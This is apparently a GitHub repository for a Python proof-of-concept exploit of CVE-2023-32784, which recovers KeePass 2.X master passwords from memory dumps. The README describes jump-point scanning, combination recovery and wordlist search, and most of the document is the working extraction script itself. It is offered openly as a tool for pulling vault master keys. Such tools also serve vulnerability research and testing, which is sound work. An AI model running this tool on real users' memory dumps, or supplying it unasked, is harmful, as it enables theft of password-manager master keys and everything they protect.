├── assets
    ├── combos.png
    ├── skip.png
    ├── example.png
    ├── wordlist.png
    └── wordsearch.png
├── README.md
└── keepass_dump.py


/assets/combos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/combos.png


--------------------------------------------------------------------------------
/assets/skip.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/skip.png


--------------------------------------------------------------------------------
/assets/example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/example.png


--------------------------------------------------------------------------------
/assets/wordlist.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordlist.png


--------------------------------------------------------------------------------
/assets/wordsearch.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/z-jxy/keepass_dump/HEAD/assets/wordsearch.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Keepass-Dumper

This is my PoC implementation for [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784).

My version is a Python port of [@vdohney's PoC](https://github.com/vdohney/keepass-password-dumper) along with a few changes and additional features.

## Changes

#

One change is to use known strings found within the dump file to jump more accurately to the location of the masterkey characters. This results in fewer false-positive characters and greatly reduces the time it takes to scan the file. If the strings aren't found in the dump file, the scan starts from the beginning. Jump points are enabled by default, but if you want to do a full scan instead, you can use `--full-scan`. For these cases, I've also added a `--skip` flag to help speed up the scan. It offsets the pointer to jump over the next 1000 bytes, as they typically just contain the same character repeated multiple times. For example, if the character `●e` was found in the dump file, it would appear like the following:

```
●e
●e
●e
●e
●e
●e
●e
●e
●e
●e
●●c
```

Using the `--skip` flag, it's possible to jump over these repeated bytes to help speed up the scan, although this isn't necessary when using the jump points.

```
[*] 15567777 | Found: ●e
[*] 15568797 | Found: ●e
[*] 15570355 | Found: ●●c
[*] 15571375 | Found: ●●c
[*] 15572925 | Found: ●●●r
[*] 15573973 | Found: ●●●r
```

![alt text](assets/skip.png)
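
The jump-point and `--skip` ideas above can be sketched roughly as follows. This is a simplified illustration, not the script itself: the names `find_jump_points`, `scan`, `entry`, and `demo` are hypothetical, and the `demo` bytes are a synthetic stand-in for a real dump. The `(Multiple values)` marker is the string `keepass_dump.py` looks for.

```python
MARKER = b"(Multiple values)"      # string the script searches for in the dump
BULLET = "●".encode("utf-16-le")   # b"\xcf\x25", the masking character


def find_jump_points(dump: bytes) -> tuple[int, int]:
    """Return (start, end) spanning the first and last marker, else the whole dump."""
    first, last = dump.find(MARKER), dump.rfind(MARKER)
    if first == -1 or first == last:
        return 0, len(dump) - 1
    return first, last


def scan(dump: bytes, start: int, end: int, skip: int = 0) -> dict[int, set[str]]:
    """Map each bullet-run length to the ASCII characters seen right after it."""
    found: dict[int, set[str]] = {}
    run, idx = 0, start
    while idx < end:
        if dump[idx:idx + 2] == BULLET:
            run += 1
            idx += 2
            continue
        # a UTF-16-LE ASCII character is a printable byte followed by 0x00
        if run and 0x20 <= dump[idx] <= 0x7E and dump[idx + 1:idx + 2] == b"\x00":
            found.setdefault(run, set()).add(chr(dump[idx]))
            idx += skip  # optionally hop over the repeated copies
        run = 0
        idx += 1
    return found


def entry(bullets: int, char: str) -> bytes:
    """Build one synthetic '●●c'-style record for the demo below."""
    return ("●" * bullets + char).encode("utf-16-le")


# Synthetic stand-in for a dump: two markers around repeated records.
demo = (MARKER + b"\x00" * 4 + entry(1, "e") + b"\x00" * 6 + entry(1, "e")
        + b"\x00" * 6 + entry(2, "c") + b"\x00" * 4 + MARKER)
start, end = find_jump_points(demo)
print(scan(demo, start, end))           # full pass between the jump points
print(scan(demo, start, end, skip=10))  # same pass, hopping after each hit
```

Both passes collect the same characters here because the skipped bytes only contain a repeat of `●e`; on a real dump a large skip may miss characters, which is why the flag is optional.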

## Features

#

This version includes recovery functionality that attempts to find any remaining unknown characters of the key. It tries to locate each possible combination of the characters found inside the dump; if a match is found, the remaining characters are pulled from the dump until a byte outside the printable ASCII range is reached.

This works if the **full** plaintext password is stored within the dump file (this seems to happen when the user reveals the masterkey by turning off the asterisk masking).

You can enable this behavior using the `--recover` flag.

![alt text](assets/example.png)
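
As a rough sketch of the recovery idea, assuming the plaintext password sits somewhere in the dump: find the candidate string, then grow the match in both directions while the bytes stay printable ASCII. The function name `extend_match` and the sample bytes are hypothetical; the 99-character cap mirrors the limit used in `keepass_dump.py`.

```python
from typing import Optional


def is_printable(byte: int) -> bool:
    """True for bytes in the printable ASCII range 0x20..0x7E."""
    return 0x20 <= byte <= 0x7E


def extend_match(dump: bytes, candidate: str, max_len: int = 99) -> Optional[str]:
    """Find candidate in the dump and grow it over neighbouring printable bytes."""
    start = dump.find(candidate.encode())
    if start == -1:
        return None  # the plaintext is not stored in this dump
    end = start + len(candidate)
    budget = max_len - len(candidate)  # how far to look on each side

    left = start
    while left > 0 and start - left < budget and is_printable(dump[left - 1]):
        left -= 1

    right = end
    while right < len(dump) and right - end < budget and is_printable(dump[right]):
        right += 1

    return dump[left:right].decode("ascii")


# Synthetic example: the partial string is surrounded by the rest of the key.
sample = b"\x00\x01secretMasterPassword123!\x00\xff"
print(extend_match(sample, "MasterPassword"))
```

If the candidate is not present in plaintext, the function returns `None` and the next combination would be tried.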

#

You can also specify an output file using `-o` to export the different combinations found. Here you can see that even when characters for another masterkey were found and the plaintext password was not stored in the dump, the combo list still gives us **23/24** characters of the key in the final combination below.

![alt text](assets/combos.png)

In this case, the first entry also shows `4/5` characters of the second key, `ducks`, which was inside the dump as well; however, it was paired with the characters of the other key, resulting in `ucks`|`tMasterPassword123!`. There seems to be a potential workaround for this, but it's still a WIP.
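
To illustrate how a combo list grows when a position has more than one candidate character, here is a minimal sketch. It uses `itertools.product` rather than the recursive string parsing in `keepass_dump.py`, and the function name `expand` and the sample input are hypothetical.

```python
from itertools import product


def expand(candidates: list[str]) -> list[str]:
    """Each item holds the candidate characters for one key position."""
    return ["".join(choice) for choice in product(*candidates)]


# Position 2 is ambiguous ("u" or "t"), so two combinations come out.
print(expand(["d", "ut", "c"]))
```

The number of combinations is the product of the candidate counts per position, so a few ambiguous positions can already produce a long list.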

#

I've also added the ability to search for potential passwords inside the dump file by providing a wordlist with `-w`. This flag generates strings containing characters from the words in the list and searches for them within the dump file. You can also specify padding for the generated strings using the `-p` or `--padding` flag.

Example: `--padding 2` => ●●a | `--padding 3` => ●●●a

![alt text](assets/wordlist.png)

For the example above, the password was stored in plaintext within the dump, so it was possible to match the string found and pull the additional characters. However, even when the password is not stored in plaintext within the dump, it's still possible to extract the remaining characters:

![alt text](assets/wordsearch.png)

In this case, even though it wasn't able to find a plaintext match in the dump, it was still able to extract all the additional characters.
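
The search strings generated from a wordlist entry can be sketched like this, following the same pattern as `build_wordlist` in `keepass_dump.py`. The function name `build_patterns` is hypothetical.

```python
def build_patterns(word: str, padding: int = 0) -> list[str]:
    """Prefix the i-th character with i (+ padding) masking bullets."""
    return ["●" * (i + padding) + ch for i, ch in enumerate(word)]


print(build_patterns("abc"))             # one pattern per character
print(build_patterns("ab", padding=2))   # every pattern shifted by two bullets

# The patterns are searched for as UTF-16-LE bytes.
print(build_patterns("a", padding=1)[0].encode("utf-16-le"))
```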

## References

#

Credit to [@vdohney](https://github.com/vdohney), who originally discovered this vulnerability. Their project is [here](https://github.com/vdohney/keepass-password-dumper).

CVE details: [CVE-2023-32784](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32784)


--------------------------------------------------------------------------------
/keepass_dump.py:
--------------------------------------------------------------------------------
import argparse
from collections import deque, OrderedDict


def get_args():
    parser = argparse.ArgumentParser(
        description="Tool for extracting masterkey from a KeePass 2.X dump. (CVE-2023-32784)"
    )
    parser.add_argument(
        "--recover",
        action="store_true",
        default=False,
        help="Attempts to recover any remaining unknown characters using combinations of the found characters",
    )
    parser.add_argument(
        "-f", "--file", required=True, help="Path to the KeePass 2.X dump file"
    )
    parser.add_argument("-w", "--wordlist", help="Scan the dumpfile against a wordlist")
    parser.add_argument(
        "--skip",
        default=False,
        action="store_true",
        help="Attempt to jump to the next ● character (Useful for large files but may miss characters)",
    )
    parser.add_argument(
        "--set-skip",
        type=int,
        help="Change the number of bytes to skip when using --skip (default: 999)",
    )
    parser.add_argument(
        "--full-scan",
        action="store_true",
        default=False,
        help="Full dump scan (slower but may find more characters)",
    )

    parser.add_argument(
        "-p",
        "--padding",
        default=0,
        type=int,
        help="Padding for wordlist search. (Ex: --padding 2 => ●●a | --padding 3 => ●●●a)",
    )

    parser.add_argument(
        "-o", "--output", help="Output file to write masterkey combinations to"
    )
    parser.add_argument(
        "--debug", action="store_true", default=False, help="Print debug information"
    )
    return parser.parse_args()


class KeePassDump:
    def __init__(self, args):
        self.args = args
        with open(args.file, "rb") as f:
            self.mem_dump = f.read()
            self.size = len(self.mem_dump)

        self.combinations = deque()
        self.found = OrderedDict()
        # number of extra bytes to jump after each hit (0 disables skipping)
        if args.skip:
            print("[*] Skipping bytes")
            if args.set_skip:
                self._skip = args.set_skip
            else:
                self._skip = 999
        else:
            self._skip = 0

    def DumpPasswords(self):
        print("[*] Searching for masterkey characters")
        chars = self.dump_pw_chars()
        if chars:
            print(f"[*] Extracted: {{UNKNOWN}}{chars}")
            if self.args.recover:
                combos = get_word_combinations(chars, deque())
                for c in combos:
                    masterKey, found = self.recover(c)
                    if found:
                        print(f"[+] masterKey: {masterKey}")
                if self.args.output:
                    with open(self.args.output, "w") as f:
                        f.write("\n".join(combos) + "\n")
                    print(f"[*] Saved {len(combos)} combinations to {self.args.output}")
            return
        else:
            print("[-] couldn't find any characters")

    def WordSearch(self):
        print(f"[*] Searching for masterkey using {self.args.wordlist}")
        wordlist = build_wordlist(self.args)
        searchResults = self.search_dump(wordlist)
        for x in searchResults:
            print(f"[+] masterKey: {x}")

    def dump_pw_chars(self) -> str:
        current_len = 0
        dbg_str = deque()
        found = OrderedDict()
        if self.args.full_scan:
            print("[*] Full scan... This may take a few seconds.")
            return self._full_scan(current_len, dbg_str, found)
        else:
            idx, endSearch = self.__get_jump_points()

        mem = self.mem_dump
        since_last_char = 0
        while idx < endSearch:
            # stop searching if we haven't found anything else to reduce false positives
            if found and since_last_char > 10000000:
                if self.args.debug:
                    print("[*] 10000000 bytes since last found. Ending scan.")
                break
            if isAsterisk(mem[idx], mem[idx + 1]):
                current_len += 1
                dbg_str.append("●")
                idx += 1
            elif current_len != 0:
                if isAscii(mem, idx):
                    # record each distinct candidate once per position
                    if current_len not in found:
                        found[current_len] = bytes([mem[idx]])
                    elif mem[idx] not in found[current_len]:
                        found[current_len] += bytes([mem[idx]])

                    if self.args.debug:
                        print(
                            f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}"
                        )
                    since_last_char = 0
                    idx += self._skip
                current_len = 0
                dbg_str.clear()
            idx += 1
            since_last_char += 1
        return self.display(found)

    def _full_scan(self, current_len, dbg_str, found):
        # stop one byte early: every check below also reads mem[idx + 1]
        idx, endSearch = 0, self.size - 1

        mem = self.mem_dump
        while idx < endSearch:
            if isAsterisk(mem[idx], mem[idx + 1]):
                current_len += 1
                dbg_str.append("●")
                idx += 1
            elif current_len != 0:
                if isAscii(mem, idx):
                    if current_len not in found:
                        found[current_len] = bytes([mem[idx]])
                    elif mem[idx] not in found[current_len]:
                        found[current_len] += bytes([mem[idx]])

                    if self.args.debug:
                        print(
                            f"[*] {idx} | Found: {''.join(dbg_str)}{bytes([mem[idx]]).decode()}"
                        )
                    idx += self._skip
                current_len = 0
                dbg_str.clear()
            idx += 1
        return self.display(found)

    def display(self, found: OrderedDict) -> str:
        chars = []
        print("[*] 0:\t{UNKNOWN}")
        for key, val in found.items():
            print(f"[*] {key}:", end="\t")
            if len(val) > 1:
                # bytes([c]) instead of c.to_bytes(), which needs Python 3.11+ without arguments
                candidates = b"<{" + b", ".join([bytes([c]) for c in val]) + b"}>"
            else:
                candidates = val
            data = candidates.decode()
            print(data)
            chars.append(data)
        return "".join(chars)

    def recover(self, search_word: str, collected=None) -> tuple[str, bool]:
        print("[?] Recovering...")

        # avoid a shared mutable default argument
        if not collected:
            collected = deque([c for c in search_word])

        key, success = self.extract_and_search(search_word, collected)
        if success:
            return key, success

        # keep the (key, success) order that callers unpack
        return "", False

    def extract_and_search(self, char: str, collected_key_chars: deque):
        idx = self.mem_dump.find(char.encode())
        if idx != -1:
            print(f"[*] Found match in dump for: {char}")
            key, found_ct = self.__extract_chars(idx, len(char), collected_key_chars)
            if found_ct != 0 and self.mem_dump.find(key.encode()) != -1:
                return key, True
            return "", False
        print(f"[-] Couldn't verify plaintext match in dump for: {char}")
        return "", False

    def search_dump(self, wordlist: dict[str, deque]) -> list[str]:
        results = {}

        for idx, (word, patterns) in enumerate(wordlist.items()):
            print(f"[*] ({idx + 1}/{len(wordlist.keys())}): {word}")
            collected, success = self._pattern_search(patterns.copy())
            if success:
                char = "".join(collected).replace("●", "")
                print(f"[*] Found string: {char}")
                key, success = self.recover(char, collected)
                if success:
                    results[word] = key
            else:
                print(f"[-] no matches found for: {word}")

        return list(set(results.values()))

    def _char_search_left(self, patterns: deque, collected: OrderedDict) -> deque:
        if not patterns:
            return deque(sorted(set(collected.values())))

        target_char = patterns.pop()
        target_idx = self.mem_dump.find(target_char.encode("utf-16-le"))

        if target_idx != -1:
            collected[target_idx] = target_char
            if self.args.debug:
                print(f"[*] Match for: {target_char}")
            if target_idx - 2600 > 0:
                mem = self.mem_dump
                dbg_str = deque(maxlen=100)
                for i in range(1, 2500):
                    idx = target_idx - 2500 - i
                    if isAscii(mem, idx):
                        for y in range(1, 99, 2):
                            if isAsterisk(mem[idx - y - 1], mem[idx - y]):
                                dbg_str.append("●")
                            elif dbg_str:
                                char = mem[idx : idx + 1].decode()
                                self.__search_callback(
                                    idx, char, dbg_str, collected, patterns
                                )
                                break
                        dbg_str.clear()
        return self._char_search_left(patterns, collected)

    def _char_search_right(self, patterns: deque, collected: OrderedDict) -> deque:
        if not patterns:
            return deque(sorted(set(collected.values())))

        target_char = patterns.popleft()
        target_idx = self.mem_dump.find(target_char.encode("utf-16-le"))

        if target_idx != -1:
            collected[target_idx] = target_char
            if self.args.debug:
                print(f"[*] Match for: {target_char}")
            if target_idx - 2600 > 0:
                mem = self.mem_dump
                dbg_str = deque(maxlen=100)
                for i in range(1, 2500):
                    idx = target_idx + 2500 + i
                    # stop before reading past the end of the dump
                    if idx + i + 1 >= self.size:
                        break
                    if isAsterisk(mem[idx + 1], mem[idx + i + 1]):
                        dbg_str.append("●" * len(target_char))
                    if dbg_str:
                        for y in range(1, 99, 2):
                            if isAscii(mem, idx + y):
                                char = mem[idx + y : idx + y + 1].decode()
                                self.__search_callback(
                                    idx, char, dbg_str, collected, patterns
                                )
                                break
                        break
        return self._char_search_right(patterns, collected)

    def _pattern_search(self, patterns: deque):
        collected = deque()
        # copy so we can use the original pattern in both searches
        _left_chars = self._char_search_left(patterns.copy(), OrderedDict())
        _right_chars = self._char_search_right(patterns.copy(), OrderedDict())

        if not _left_chars and not _right_chars:
            return collected, False

        # merge collected characters
        for i in range(len(_left_chars)):
            if _left_chars[i] not in _right_chars:
                _right_chars.insert(i, _left_chars[i])

        collected.extend(_right_chars)
        return collected, True

    def __search_callback(self, idx, char, dbg_str, collected, patterns):
        dbg_str = f'{"".join(dbg_str)}{char}'
        if dbg_str not in collected.values():
            collected[idx] = dbg_str
            if dbg_str not in patterns:
                if self.args.debug:
                    print(f"[*] Match for: {char}")
                patterns.append(dbg_str)

    def __extract_chars(self, start: int, chars_len: int, collected) -> tuple[str, int]:
        """Extracts the remaining characters of the masterkey from the dump if they're stored in plaintext by being displayed within the application"""
        print("[*] Extracted chars:", end="\t")
        mem = self.mem_dump

        init_len = len(collected)
        last_len = init_len

        # walk backwards from the match while the bytes are printable ASCII
        for i in range(1, 99 - chars_len):  # 99 => max length for masterkey
            if start - i < 0 or not 0x20 <= mem[start - i] <= 0x7E:
                break
            collected.appendleft(chr(mem[start - i]))

        print("{ ", end="")

        if len(collected) == last_len:
            print("(none)", end="")
        else:
            for x in range(len(collected) - last_len):
                print(collected[x], end="")

        print(" <- -> ", end="")

        last_len = len(collected)

        # walk forwards from the end of the match while the bytes are printable ASCII
        for i in range(99 - chars_len):
            pos = start + chars_len + i
            if pos >= self.size or not 0x20 <= mem[pos] <= 0x7E:
                if len(collected) == last_len:
                    print("(none)", end="")
                break
            char = chr(mem[pos])
            print(char, end="")
            collected.append(char)

        print(" }")

        if len(collected) == init_len:
            print("[-] No new chars found")
            return "".join(collected).replace("●", ""), 0

        return "".join(collected).replace("●", ""), len(collected) - init_len

    def __get_jump_points(self) -> tuple[int, int]:
        try:
            i = self.mem_dump.index(b"(Multiple values)")
            endSearch = self.mem_dump.rindex(b"(Multiple values)")
            if i != endSearch:
                print("[*] Using jump points")
                return i, endSearch
            print("[-] Only one jump point found. Scanning with slower method.")
            return 0, len(self.mem_dump) - 1
        except ValueError:
            # bytes.index / bytes.rindex raise ValueError when the marker is missing
            print("[-] Couldn't find jump points in file. Scanning with slower method.")
            return 0, len(self.mem_dump) - 1


def isAscii(mem_dump, idx) -> bool:
    # printable ASCII byte followed by 0x00 (a UTF-16-LE ASCII character)
    return (
        idx + 1 < len(mem_dump)
        and 0x20 <= mem_dump[idx] <= 0x7E
        and mem_dump[idx + 1] == 0x00
    )


def isAsterisk(x, y) -> bool:
    # "●" (U+25CF) is the byte pair CF 25 in UTF-16-LE
    return x == 0xCF and y == 0x25


def get_word_combinations(chars, combinations, current="") -> deque:
    if not chars:
        combinations.append(current)
        return combinations

    if chars.startswith("<{") and "}>" in chars:
        # "<{a, b}>" marks a position with several candidate characters
        opening_idx = chars.index("<{")
        closing_idx = chars.index("}>")
        options = chars[opening_idx + 2 : closing_idx].split(", ")
        for option in options:
            get_word_combinations(
                chars[closing_idx + 2 :], combinations, current + option
            )
    else:
        get_word_combinations(chars[1:], combinations, current + chars[0])

    return combinations


def build_wordlist(args) -> dict[str, deque]:
    with open(args.wordlist, "r") as f:
        # ignore blank lines so they don't produce empty search patterns
        wordlist = [line.strip() for line in f if line.strip()]

    candidates: dict[str, deque] = {}

    for word in wordlist:
        candidates[word] = deque(
            [f"{'●' * (x + args.padding)}{word[x]}" for x in range(len(word))]
        )
    return candidates


def main(args):
    kpd = KeePassDump(args)

    if args.wordlist:
        kpd.WordSearch()
    else:
        kpd.DumpPasswords()


if __name__ == "__main__":
    main(get_args())


--------------------------------------------------------------------------------